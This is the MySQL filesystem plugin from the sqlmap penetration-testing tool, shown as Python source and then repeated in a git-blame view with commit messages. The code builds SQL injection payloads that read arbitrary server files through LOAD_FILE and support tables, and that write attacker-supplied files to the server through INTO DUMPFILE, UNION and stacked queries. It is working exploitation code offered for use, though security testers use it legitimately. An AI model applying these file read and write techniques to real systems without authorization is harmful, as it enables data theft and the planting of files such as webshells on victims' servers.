sqlmap/plugins/dbms/mysql/filesystem.py

#!/usr/bin/env python

"""
Copyright (c) 2006-2021 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

from lib.core.agent import agent
from lib.core.common import getSQLSnippet
from lib.core.common import isNumPosStrValue
from lib.core.common import isTechniqueAvailable
from lib.core.common import popValue
from lib.core.common import pushValue
from lib.core.common import randomStr
from lib.core.common import singleTimeWarnMessage
from lib.core.compat import xrange
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.decorators import stackedmethod
from lib.core.enums import CHARSET_TYPE
from lib.core.enums import DBMS
from lib.core.enums import EXPECTED
from lib.core.enums import PAYLOAD
from lib.core.enums import PLACE
from lib.core.exception import SqlmapNoneDataException
from lib.request import inject
from lib.request.connect import Connect as Request
from lib.techniques.union.use import unionUse
from plugins.generic.filesystem import Filesystem as GenericFilesystem

class Filesystem(GenericFilesystem):
    def nonStackedReadFile(self, rFile):
        if not kb.bruteMode:
            infoMsg = "fetching file: '%s'" % rFile
            logger.info(infoMsg)

        result = inject.getValue("HEX(LOAD_FILE('%s'))" % rFile, charsetType=CHARSET_TYPE.HEXADECIMAL)

        return result

    def stackedReadFile(self, remoteFile):
        if not kb.bruteMode:
            infoMsg = "fetching file: '%s'" % remoteFile
            logger.info(infoMsg)

        self.createSupportTbl(self.fileTblName, self.tblField, "longtext")
        self.getRemoteTempPath()

        tmpFile = "%s/tmpf%s" % (conf.tmpPath, randomStr(lowercase=True))

        debugMsg = "saving hexadecimal encoded content of file '%s' " % remoteFile
        debugMsg += "into temporary file '%s'" % tmpFile
        logger.debug(debugMsg)
        inject.goStacked("SELECT HEX(LOAD_FILE('%s')) INTO DUMPFILE '%s'" % (remoteFile, tmpFile))

        debugMsg = "loading the content of hexadecimal encoded file "
        debugMsg += "'%s' into support table" % remoteFile
        logger.debug(debugMsg)
        inject.goStacked("LOAD DATA INFILE '%s' INTO TABLE %s FIELDS TERMINATED BY '%s' (%s)" % (tmpFile, self.fileTblName, randomStr(10), self.tblField))

        length = inject.getValue("SELECT LENGTH(%s) FROM %s" % (self.tblField, self.fileTblName), resumeValue=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)

        if not isNumPosStrValue(length):
            warnMsg = "unable to retrieve the content of the "
            warnMsg += "file '%s'" % remoteFile

            if conf.direct or isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION):
                if not kb.bruteMode:
                    warnMsg += ", going to fall-back to simpler UNION technique"
                    logger.warn(warnMsg)
                result = self.nonStackedReadFile(remoteFile)
            else:
                raise SqlmapNoneDataException(warnMsg)
        else:
            length = int(length)
            chunkSize = 1024

            if length > chunkSize:
                result = []

                for i in xrange(1, length, chunkSize):
                    chunk = inject.getValue("SELECT MID(%s, %d, %d) FROM %s" % (self.tblField, i, chunkSize, self.fileTblName), unpack=False, resumeValue=False, charsetType=CHARSET_TYPE.HEXADECIMAL)
                    result.append(chunk)
            else:
                result = inject.getValue("SELECT %s FROM %s" % (self.tblField, self.fileTblName), resumeValue=False, charsetType=CHARSET_TYPE.HEXADECIMAL)

        return result

    @stackedmethod
    def unionWriteFile(self, localFile, remoteFile, fileType, forceCheck=False):
        logger.debug("encoding file to its hexadecimal string value")

        fcEncodedList = self.fileEncode(localFile, "hex", True)
        fcEncodedStr = fcEncodedList[0]
        fcEncodedStrLen = len(fcEncodedStr)

        if kb.injection.place == PLACE.GET and fcEncodedStrLen > 8000:
            warnMsg = "as the injection is on a GET parameter and the file "
            warnMsg += "to be written hexadecimal value is %d " % fcEncodedStrLen
            warnMsg += "bytes, this might cause errors in the file "
            warnMsg += "writing process"
            logger.warn(warnMsg)

        debugMsg = "exporting the %s file content to file '%s'" % (fileType, remoteFile)
        logger.debug(debugMsg)

        pushValue(kb.forceWhere)
        kb.forceWhere = PAYLOAD.WHERE.NEGATIVE
        sqlQuery = "%s INTO DUMPFILE '%s'" % (fcEncodedStr, remoteFile)
        unionUse(sqlQuery, unpack=False)
        kb.forceWhere = popValue()

        warnMsg = "expect junk characters inside the "
        warnMsg += "file as a leftover from UNION query"
        singleTimeWarnMessage(warnMsg)

        return self.askCheckWrittenFile(localFile, remoteFile, forceCheck)

    def linesTerminatedWriteFile(self, localFile, remoteFile, fileType, forceCheck=False):
        logger.debug("encoding file to its hexadecimal string value")

        fcEncodedList = self.fileEncode(localFile, "hex", True)
        fcEncodedStr = fcEncodedList[0][2:]
        fcEncodedStrLen = len(fcEncodedStr)

        if kb.injection.place == PLACE.GET and fcEncodedStrLen > 8000:
            warnMsg = "the injection is on a GET parameter and the file "
            warnMsg += "to be written hexadecimal value is %d " % fcEncodedStrLen
            warnMsg += "bytes, this might cause errors in the file "
            warnMsg += "writing process"
            logger.warn(warnMsg)

        debugMsg = "exporting the %s file content to file '%s'" % (fileType, remoteFile)
        logger.debug(debugMsg)

        query = getSQLSnippet(DBMS.MYSQL, "write_file_limit", OUTFILE=remoteFile, HEXSTRING=fcEncodedStr)
        query = agent.prefixQuery(query)        # Note: No need for suffix as 'write_file_limit' already ends with comment (required)
        payload = agent.payload(newValue=query)
        Request.queryPage(payload, content=False, raise404=False, silent=True, noteResponseTime=False)

        warnMsg = "expect junk characters inside the "
        warnMsg += "file as a leftover from original query"
        singleTimeWarnMessage(warnMsg)

        return self.askCheckWrittenFile(localFile, remoteFile, forceCheck)

    def stackedWriteFile(self, localFile, remoteFile, fileType, forceCheck=False):
        debugMsg = "creating a support table to write the hexadecimal "
        debugMsg += "encoded file to"
        logger.debug(debugMsg)

        self.createSupportTbl(self.fileTblName, self.tblField, "longblob")

        logger.debug("encoding file to its hexadecimal string value")
        fcEncodedList = self.fileEncode(localFile, "hex", False)

        debugMsg = "forging SQL statements to write the hexadecimal "
        debugMsg += "encoded file to the support table"
        logger.debug(debugMsg)

        sqlQueries = self.fileToSqlQueries(fcEncodedList)

        logger.debug("inserting the hexadecimal encoded file to the support table")

        inject.goStacked("SET GLOBAL max_allowed_packet = %d" % (1024 * 1024))  # 1MB (Note: https://github.com/sqlmapproject/sqlmap/issues/3230)

        for sqlQuery in sqlQueries:
            inject.goStacked(sqlQuery)

        debugMsg = "exporting the %s file content to file '%s'" % (fileType, remoteFile)
        logger.debug(debugMsg)

        # Reference: http://dev.mysql.com/doc/refman/5.1/en/select.html
        inject.goStacked("SELECT %s FROM %s INTO DUMPFILE '%s'" % (self.tblField, self.fileTblName, remoteFile), silent=True)

        return self.askCheckWrittenFile(localFile, remoteFile, forceCheck)
Last preparations for DREI 2019-05-08 13:47:52 +03:00			`#!/usr/bin/env python`
Major code refactoring: moved and split plugins (mysql, pgsql, mssql, oracle) more granularly and organized. Todo for firebird, sqlite, access. 2010-03-23 01:57:57 +03:00
			`"""`
Copyright year bump 2020-12-31 13:46:27 +03:00			`Copyright (c) 2006-2021 sqlmap developers (http://sqlmap.org/)`
Replacing doc/COPYING to LICENSE 2017-10-11 15:50:46 +03:00			`See the file 'LICENSE' for copying permission`
Major code refactoring: moved and split plugins (mysql, pgsql, mssql, oracle) more granularly and organized. Todo for firebird, sqlite, access. 2010-03-23 01:57:57 +03:00			`"""`

Implementation for an Issue #647 2018-09-06 01:59:29 +03:00			`from lib.core.agent import agent`
			`from lib.core.common import getSQLSnippet`
minor fix 2011-09-21 02:16:56 +04:00			`from lib.core.common import isNumPosStrValue`
minor bug fix 2012-05-18 12:51:50 +04:00			`from lib.core.common import isTechniqueAvailable`
Minor improvement to UNION file write 2015-07-26 18:02:46 +03:00			`from lib.core.common import popValue`
			`from lib.core.common import pushValue`
Major code refactoring: moved and split plugins (mysql, pgsql, mssql, oracle) more granularly and organized. Todo for firebird, sqlite, access. 2010-03-23 01:57:57 +03:00			`from lib.core.common import randomStr`
minor fix 2011-09-21 02:16:56 +04:00			`from lib.core.common import singleTimeWarnMessage`
Some more DREI stuff 2019-03-28 18:04:38 +03:00			`from lib.core.compat import xrange`
Major code refactoring: moved and split plugins (mysql, pgsql, mssql, oracle) more granularly and organized. Todo for firebird, sqlite, access. 2010-03-23 01:57:57 +03:00			`from lib.core.data import conf`
			`from lib.core.data import kb`
			`from lib.core.data import logger`
Potential patch for Issues like #3013 and #3017 2018-04-01 13:45:47 +03:00			`from lib.core.decorators import stackedmethod`
code refactoring regarding charsetType inside inference/bisection 2012-02-29 18:36:23 +04:00			`from lib.core.enums import CHARSET_TYPE`
Implementation for an Issue #647 2018-09-06 01:59:29 +03:00			`from lib.core.enums import DBMS`
few fixes related to bug report by Shadow Folder (AttributeError: 'list' object has no attribute 'isdigit') 2012-04-04 13:25:05 +04:00			`from lib.core.enums import EXPECTED`
minor fix 2012-05-24 22:05:33 +04:00			`from lib.core.enums import PAYLOAD`
further refactoring (all enumerations are now put into enums.py) 2010-11-08 12:20:02 +03:00			`from lib.core.enums import PLACE`
Doing some more style updating (capitalization of exception classes; using _ is enough for private members - __ is used in Python specific methods) 2012-12-06 17:14:19 +04:00			`from lib.core.exception import SqlmapNoneDataException`
Major code refactoring: moved and split plugins (mysql, pgsql, mssql, oracle) more granularly and organized. Todo for firebird, sqlite, access. 2010-03-23 01:57:57 +03:00			`from lib.request import inject`
Implementation for an Issue #647 2018-09-06 01:59:29 +03:00			`from lib.request.connect import Connect as Request`
Moved folder 2011-06-18 16:34:41 +04:00			`from lib.techniques.union.use import unionUse`
Major code refactoring: moved and split plugins (mysql, pgsql, mssql, oracle) more granularly and organized. Todo for firebird, sqlite, access. 2010-03-23 01:57:57 +03:00			`from plugins.generic.filesystem import Filesystem as GenericFilesystem`

			`class Filesystem(GenericFilesystem):`
proper naming 2012-07-06 18:13:50 +04:00			`def nonStackedReadFile(self, rFile):`
Implements #2908 2019-06-27 18:28:43 +03:00			`if not kb.bruteMode:`
			`infoMsg = "fetching file: '%s'" % rFile`
			`logger.info(infoMsg)`
Major code refactoring: moved and split plugins (mysql, pgsql, mssql, oracle) more granularly and organized. Todo for firebird, sqlite, access. 2010-03-23 01:57:57 +03:00
Patch regarding Issue #774 (SELECT is redundant in case of LOAD_FILE) 2014-08-16 16:23:07 +04:00			`result = inject.getValue("HEX(LOAD_FILE('%s'))" % rFile, charsetType=CHARSET_TYPE.HEXADECIMAL)`
Major code refactoring: moved and split plugins (mysql, pgsql, mssql, oracle) more granularly and organized. Todo for firebird, sqlite, access. 2010-03-23 01:57:57 +03:00
			`return result`

Some renaming (pylint stuff) 2019-06-03 11:41:51 +03:00			`def stackedReadFile(self, remoteFile):`
Implements #2908 2019-06-27 18:28:43 +03:00			`if not kb.bruteMode:`
			`infoMsg = "fetching file: '%s'" % remoteFile`
			`logger.info(infoMsg)`
Major code refactoring: moved and split plugins (mysql, pgsql, mssql, oracle) more granularly and organized. Todo for firebird, sqlite, access. 2010-03-23 01:57:57 +03:00
			`self.createSupportTbl(self.fileTblName, self.tblField, "longtext")`
			`self.getRemoteTempPath()`

			`tmpFile = "%s/tmpf%s" % (conf.tmpPath, randomStr(lowercase=True))`

Some renaming (pylint stuff) 2019-06-03 11:41:51 +03:00			`debugMsg = "saving hexadecimal encoded content of file '%s' " % remoteFile`
Major code refactoring: moved and split plugins (mysql, pgsql, mssql, oracle) more granularly and organized. Todo for firebird, sqlite, access. 2010-03-23 01:57:57 +03:00			`debugMsg += "into temporary file '%s'" % tmpFile`
			`logger.debug(debugMsg)`
Some renaming (pylint stuff) 2019-06-03 11:41:51 +03:00			`inject.goStacked("SELECT HEX(LOAD_FILE('%s')) INTO DUMPFILE '%s'" % (remoteFile, tmpFile))`
Major code refactoring: moved and split plugins (mysql, pgsql, mssql, oracle) more granularly and organized. Todo for firebird, sqlite, access. 2010-03-23 01:57:57 +03:00
Minor code restyling 2011-04-30 17:20:05 +04:00			`debugMsg = "loading the content of hexadecimal encoded file "`
Some renaming (pylint stuff) 2019-06-03 11:41:51 +03:00			`debugMsg += "'%s' into support table" % remoteFile`
Major code refactoring: moved and split plugins (mysql, pgsql, mssql, oracle) more granularly and organized. Todo for firebird, sqlite, access. 2010-03-23 01:57:57 +03:00			`logger.debug(debugMsg)`
			`inject.goStacked("LOAD DATA INFILE '%s' INTO TABLE %s FIELDS TERMINATED BY '%s' (%s)" % (tmpFile, self.fileTblName, randomStr(10), self.tblField))`

few just in case fixes (unarrayizeValue in dumpTable entries) and and some refactoring (unique is now not done for every union case but only if detected that there are duplicates in union test) 2012-06-16 00:41:53 +04:00			`length = inject.getValue("SELECT LENGTH(%s) FROM %s" % (self.tblField, self.fileTblName), resumeValue=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)`
Major code refactoring: moved and split plugins (mysql, pgsql, mssql, oracle) more granularly and organized. Todo for firebird, sqlite, access. 2010-03-23 01:57:57 +03:00
minor fix 2011-09-21 02:16:56 +04:00			`if not isNumPosStrValue(length):`
Falling back to unionReadFile() when --file-read does not work against MySQL. This happens when the session user does not have INSERT privilege, required to run LOAD DATA INFILE 2012-04-19 18:05:45 +04:00			`warnMsg = "unable to retrieve the content of the "`
Some renaming (pylint stuff) 2019-06-03 11:41:51 +03:00			`warnMsg += "file '%s'" % remoteFile`
Falling back to unionReadFile() when --file-read does not work against MySQL. This happens when the session user does not have INSERT privilege, required to run LOAD DATA INFILE 2012-04-19 18:05:45 +04:00
			`if conf.direct or isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION):`
Implements #2908 2019-06-27 18:28:43 +03:00			`if not kb.bruteMode:`
			`warnMsg += ", going to fall-back to simpler UNION technique"`
			`logger.warn(warnMsg)`
Some renaming (pylint stuff) 2019-06-03 11:41:51 +03:00			`result = self.nonStackedReadFile(remoteFile)`
Falling back to unionReadFile() when --file-read does not work against MySQL. This happens when the session user does not have INSERT privilege, required to run LOAD DATA INFILE 2012-04-19 18:05:45 +04:00			`else:`
Replacing old and deprecated raise Exception style (PEP8) 2013-01-04 02:20:55 +04:00			`raise SqlmapNoneDataException(warnMsg)`
Falling back to unionReadFile() when --file-read does not work against MySQL. This happens when the session user does not have INSERT privilege, required to run LOAD DATA INFILE 2012-04-19 18:05:45 +04:00			`else:`
			`length = int(length)`
Minor updates 2018-01-31 13:13:08 +03:00			`chunkSize = 1024`
Major code refactoring: moved and split plugins (mysql, pgsql, mssql, oracle) more granularly and organized. Todo for firebird, sqlite, access. 2010-03-23 01:57:57 +03:00
Minor updates 2018-01-31 13:13:08 +03:00			`if length > chunkSize:`
Falling back to unionReadFile() when --file-read does not work against MySQL. This happens when the session user does not have INSERT privilege, required to run LOAD DATA INFILE 2012-04-19 18:05:45 +04:00			`result = []`
Major code refactoring: moved and split plugins (mysql, pgsql, mssql, oracle) more granularly and organized. Todo for firebird, sqlite, access. 2010-03-23 01:57:57 +03:00
Minor updates 2018-01-31 13:13:08 +03:00			`for i in xrange(1, length, chunkSize):`
			`chunk = inject.getValue("SELECT MID(%s, %d, %d) FROM %s" % (self.tblField, i, chunkSize, self.fileTblName), unpack=False, resumeValue=False, charsetType=CHARSET_TYPE.HEXADECIMAL)`
Falling back to unionReadFile() when --file-read does not work against MySQL. This happens when the session user does not have INSERT privilege, required to run LOAD DATA INFILE 2012-04-19 18:05:45 +04:00			`result.append(chunk)`
			`else:`
few just in case fixes (unarrayizeValue in dumpTable entries) and and some refactoring (unique is now not done for every union case but only if detected that there are duplicates in union test) 2012-06-16 00:41:53 +04:00			`result = inject.getValue("SELECT %s FROM %s" % (self.tblField, self.fileTblName), resumeValue=False, charsetType=CHARSET_TYPE.HEXADECIMAL)`
Major code refactoring: moved and split plugins (mysql, pgsql, mssql, oracle) more granularly and organized. Todo for firebird, sqlite, access. 2010-03-23 01:57:57 +03:00
			`return result`

Potential patch for Issues like #3013 and #3017 2018-04-01 13:45:47 +03:00			`@stackedmethod`
Some renaming (pylint stuff) 2019-06-03 11:41:51 +03:00			`def unionWriteFile(self, localFile, remoteFile, fileType, forceCheck=False):`
Major code refactoring: moved and split plugins (mysql, pgsql, mssql, oracle) more granularly and organized. Todo for firebird, sqlite, access. 2010-03-23 01:57:57 +03:00			`logger.debug("encoding file to its hexadecimal string value")`

Some renaming (pylint stuff) 2019-06-03 11:41:51 +03:00			`fcEncodedList = self.fileEncode(localFile, "hex", True)`
Minor code restyling 2011-04-30 17:20:05 +04:00			`fcEncodedStr = fcEncodedList[0]`
Major code refactoring: moved and split plugins (mysql, pgsql, mssql, oracle) more granularly and organized. Todo for firebird, sqlite, access. 2010-03-23 01:57:57 +03:00			`fcEncodedStrLen = len(fcEncodedStr)`

Rewrite from scratch the detection engine. Now it performs checks defined in payload.xml. User can specify its own. All (hopefully) functionalities should still be working. Added two switches, --level and --risk to specify which injection tests and boundaries to use. The main advantage now is that sqlmap is able to identify initially which injection types are present so for instance if boolean-based blind is not supported, but error-based is, sqlmap will keep going and work! 2010-11-28 21:10:54 +03:00			`if kb.injection.place == PLACE.GET and fcEncodedStrLen > 8000:`
Trivial refactoring for #4379 2020-10-13 12:05:13 +03:00			`warnMsg = "as the injection is on a GET parameter and the file "`
Major code refactoring: moved and split plugins (mysql, pgsql, mssql, oracle) more granularly and organized. Todo for firebird, sqlite, access. 2010-03-23 01:57:57 +03:00			`warnMsg += "to be written hexadecimal value is %d " % fcEncodedStrLen`
			`warnMsg += "bytes, this might cause errors in the file "`
			`warnMsg += "writing process"`
			`logger.warn(warnMsg)`

Some renaming (pylint stuff) 2019-06-03 11:41:51 +03:00			`debugMsg = "exporting the %s file content to file '%s'" % (fileType, remoteFile)`
Major code refactoring: moved and split plugins (mysql, pgsql, mssql, oracle) more granularly and organized. Todo for firebird, sqlite, access. 2010-03-23 01:57:57 +03:00			`logger.debug(debugMsg)`

Minor improvement to UNION file write 2015-07-26 18:02:46 +03:00			`pushValue(kb.forceWhere)`
			`kb.forceWhere = PAYLOAD.WHERE.NEGATIVE`
Some renaming (pylint stuff) 2019-06-03 11:41:51 +03:00			`sqlQuery = "%s INTO DUMPFILE '%s'" % (fcEncodedStr, remoteFile)`
Minor bug fix so that --file-write on MySQL via UNION query now works again 2011-02-12 02:35:45 +03:00			`unionUse(sqlQuery, unpack=False)`
Minor improvement to UNION file write 2015-07-26 18:02:46 +03:00			`kb.forceWhere = popValue()`
Major code refactoring: moved and split plugins (mysql, pgsql, mssql, oracle) more granularly and organized. Todo for firebird, sqlite, access. 2010-03-23 01:57:57 +03:00
minor update 2011-06-07 19:13:51 +04:00			`warnMsg = "expect junk characters inside the "`
			`warnMsg += "file as a leftover from UNION query"`
more concise 2011-06-08 18:35:23 +04:00			`singleTimeWarnMessage(warnMsg)`
minor update 2011-06-07 19:13:51 +04:00
Some renaming (pylint stuff) 2019-06-03 11:41:51 +03:00			`return self.askCheckWrittenFile(localFile, remoteFile, forceCheck)`
minor adjustment 2013-01-23 06:10:38 +04:00
Some renaming (pylint stuff) 2019-06-03 11:41:51 +03:00			`def linesTerminatedWriteFile(self, localFile, remoteFile, fileType, forceCheck=False):`
Implementation for an Issue #647 2018-09-06 01:59:29 +03:00			`logger.debug("encoding file to its hexadecimal string value")`

Some renaming (pylint stuff) 2019-06-03 11:41:51 +03:00			`fcEncodedList = self.fileEncode(localFile, "hex", True)`
Implementation for an Issue #647 2018-09-06 01:59:29 +03:00			`fcEncodedStr = fcEncodedList[0][2:]`
			`fcEncodedStrLen = len(fcEncodedStr)`

			`if kb.injection.place == PLACE.GET and fcEncodedStrLen > 8000:`
			`warnMsg = "the injection is on a GET parameter and the file "`
			`warnMsg += "to be written hexadecimal value is %d " % fcEncodedStrLen`
			`warnMsg += "bytes, this might cause errors in the file "`
			`warnMsg += "writing process"`
			`logger.warn(warnMsg)`

Some renaming (pylint stuff) 2019-06-03 11:41:51 +03:00			`debugMsg = "exporting the %s file content to file '%s'" % (fileType, remoteFile)`
Implementation for an Issue #647 2018-09-06 01:59:29 +03:00			`logger.debug(debugMsg)`

Some renaming (pylint stuff) 2019-06-03 11:41:51 +03:00			`query = getSQLSnippet(DBMS.MYSQL, "write_file_limit", OUTFILE=remoteFile, HEXSTRING=fcEncodedStr)`
Implementation for an Issue #647 2018-09-06 01:59:29 +03:00			`query = agent.prefixQuery(query) # Note: No need for suffix as 'write_file_limit' already ends with comment (required)`
			`payload = agent.payload(newValue=query)`
Minor cleaning up 2018-10-03 12:27:51 +03:00			`Request.queryPage(payload, content=False, raise404=False, silent=True, noteResponseTime=False)`
Implementation for an Issue #647 2018-09-06 01:59:29 +03:00
			`warnMsg = "expect junk characters inside the "`
			`warnMsg += "file as a leftover from original query"`
			`singleTimeWarnMessage(warnMsg)`

Some renaming (pylint stuff) 2019-06-03 11:41:51 +03:00			`return self.askCheckWrittenFile(localFile, remoteFile, forceCheck)`
Implementation for an Issue #647 2018-09-06 01:59:29 +03:00
Some renaming (pylint stuff) 2019-06-03 11:41:51 +03:00			`def stackedWriteFile(self, localFile, remoteFile, fileType, forceCheck=False):`
Minor code restyling 2011-04-30 17:20:05 +04:00			`debugMsg = "creating a support table to write the hexadecimal "`
Major code refactoring: moved and split plugins (mysql, pgsql, mssql, oracle) more granularly and organized. Todo for firebird, sqlite, access. 2010-03-23 01:57:57 +03:00			`debugMsg += "encoded file to"`
			`logger.debug(debugMsg)`

			`self.createSupportTbl(self.fileTblName, self.tblField, "longblob")`

			`logger.debug("encoding file to its hexadecimal string value")`
Some renaming (pylint stuff) 2019-06-03 11:41:51 +03:00			`fcEncodedList = self.fileEncode(localFile, "hex", False)`
Major code refactoring: moved and split plugins (mysql, pgsql, mssql, oracle) more granularly and organized. Todo for firebird, sqlite, access. 2010-03-23 01:57:57 +03:00
Minor code restyling 2011-04-30 17:20:05 +04:00			`debugMsg = "forging SQL statements to write the hexadecimal "`
Major code refactoring: moved and split plugins (mysql, pgsql, mssql, oracle) more granularly and organized. Todo for firebird, sqlite, access. 2010-03-23 01:57:57 +03:00			`debugMsg += "encoded file to the support table"`
			`logger.debug(debugMsg)`

			`sqlQueries = self.fileToSqlQueries(fcEncodedList)`

			`logger.debug("inserting the hexadecimal encoded file to the support table")`

Minor update regarding #3230 2018-09-10 13:43:59 +03:00			`inject.goStacked("SET GLOBAL max_allowed_packet = %d" % (1024 * 1024)) # 1MB (Note: https://github.com/sqlmapproject/sqlmap/issues/3230)`

Major code refactoring: moved and split plugins (mysql, pgsql, mssql, oracle) more granularly and organized. Todo for firebird, sqlite, access. 2010-03-23 01:57:57 +03:00			`for sqlQuery in sqlQueries:`
			`inject.goStacked(sqlQuery)`

Some renaming (pylint stuff) 2019-06-03 11:41:51 +03:00			`debugMsg = "exporting the %s file content to file '%s'" % (fileType, remoteFile)`
Major code refactoring: moved and split plugins (mysql, pgsql, mssql, oracle) more granularly and organized. Todo for firebird, sqlite, access. 2010-03-23 01:57:57 +03:00			`logger.debug(debugMsg)`

			`# Reference: http://dev.mysql.com/doc/refman/5.1/en/select.html`
Some renaming (pylint stuff) 2019-06-03 11:41:51 +03:00			`inject.goStacked("SELECT %s FROM %s INTO DUMPFILE '%s'" % (self.tblField, self.fileTblName, remoteFile), silent=True)`
Major code refactoring: moved and split plugins (mysql, pgsql, mssql, oracle) more granularly and organized. Todo for firebird, sqlite, access. 2010-03-23 01:57:57 +03:00
Some renaming (pylint stuff) 2019-06-03 11:41:51 +03:00			`return self.askCheckWrittenFile(localFile, remoteFile, forceCheck)`